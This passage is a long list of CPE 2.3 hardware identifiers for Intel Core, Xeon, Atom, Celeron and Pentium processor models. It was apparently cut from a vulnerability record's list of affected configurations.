"cpe:2.3:h:intel:xeon_e3:1565l_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:w3680:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3217u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1270_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2760qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3635qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j1850:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1125c:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1270:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2940:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1660_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l7555:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2655le:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2650l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1505l_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3735d:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7700hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3517u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6100u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7567u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4820:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6134m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4460:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3405:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1271_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:w3670:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2430m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8850:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2690_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:930:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4330:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4650_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8867_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3630qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2657m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4830_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:620m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:8400:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7700k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2870:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5350u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2508:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4330te:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3708:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7500u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6138:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2648l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2550k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4130:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3820qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:990x:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4712mq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3610qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1428l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3735f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j3355:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2620_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4620_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3530:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2630:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2690_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:920:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5250u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5640:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3339y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1535m_v6:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8893_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2850:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5670:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_j:j4205:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1226_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2758:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4850_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2418l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2500s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2450m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1501l_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2806:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:560m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m:5y10c:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:8350k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4340:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_n:n4200:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2630l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4025u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3538:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2805:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1245:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2623_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m:5y31:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4710mq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4430:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4200u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:650:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e6510:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2500k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6360u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4010y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2718:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5672:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4667_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1290:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5609:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n3010:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:8350u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2120:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2699_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8890_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4980hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m:5y70:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2960xm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1545m_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2699a_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2600k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:660:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:875k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4770s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x3480:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:w5590:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2675qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3470t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5630:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6600t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2357m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2880_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4370:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2510e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3580:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3337u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1230_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6142:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2630_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3770k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2407_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4402ec:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2603_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2420:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2515e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8891_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3220:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2687w_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8180:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2658_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1245_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j1750:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4809_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1630_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1650_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x6550:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8176m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7285:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8890_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1275_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:620ue:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2629m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1268l_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4150:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l7545:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4790s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2698_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2920:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4820_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4120u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x7560:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_n:n3510:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1225_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:860:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6300:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6152:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3750:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2120t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8176:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3250t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:540:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_n:n3540:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3217ue:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x3440:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7290:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2680_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2860qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:450m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6006u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4860_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2405s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z2460:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_e:e3805:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:350m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1428l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4570te:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4785t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2410m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2558:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1258l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2440:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4610m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:8250u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x3460:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4770:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2450p:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6138f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6132:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:610e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5606:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2807:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:640um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4810mq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4160t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2367m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2470:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5530:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1660_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4570t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3736g:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j3160:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3250:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2430:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1275:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6142m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8870_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2390t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4870hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4200h:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_e:e3815:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2609_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1280_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6130f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1220_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_silver:4116:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5508:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4850_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6500:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4310u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8176f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4660_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1501m_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4308u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1585_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6200u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:840qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4460s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1428l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2683_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2628l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4770r:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6136:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2665:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5507:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4340m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7250f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4800mq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2538:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4330t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4607_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4600m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4500u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_12201_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1220_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7290f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3120me:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2312m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:620lm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:980:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2450:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5950hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4030y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:640m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2648l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4590t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4000m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5850hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:660lm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2340ue:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2658_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4670:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2710qe:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6300t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5520:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2738:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5850eq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2440_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:5118:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:330um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1680_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7235:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2658:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2640_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4690k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:620le:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_j:j2900:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7660u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:975:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:w3690:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3470:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8870_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2803:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4960hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4750hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z2580:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3230rk:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1650_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:w5580:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5570:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2667:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3225:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3317u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2430l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4288u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2667_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6144:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1105c_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5257u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5506:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3110m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6600:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4648_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_n:n3710:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7820eq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6154:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j1900:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5200u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4278u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e6540:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2540m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6500te:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4850hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2428l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1270_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4650_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2408l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4790k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6267u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4620_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6400:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x7550:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4350u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1286_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4670s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1650:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8160t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4790t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:965:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2840:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2609:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3340m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4770te:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:655k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7560u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5620:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2637_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4720hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m7:6y75:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4460t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2608l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3245:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2370m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6102e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3380m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4627_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2640m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1505l_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n3150:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3612qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2720qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2328m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4702hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4300y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4617:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8880_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6500t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2420_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3795:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n3050:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7210f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1260l_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4370t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4202y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6167u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:640lm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2628l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l3406:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6130:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m3:6y30:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3612qe:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3338:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4430s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2660_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1285l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4110m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5667:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8894_v4:*:*:*:*:*:*:*", 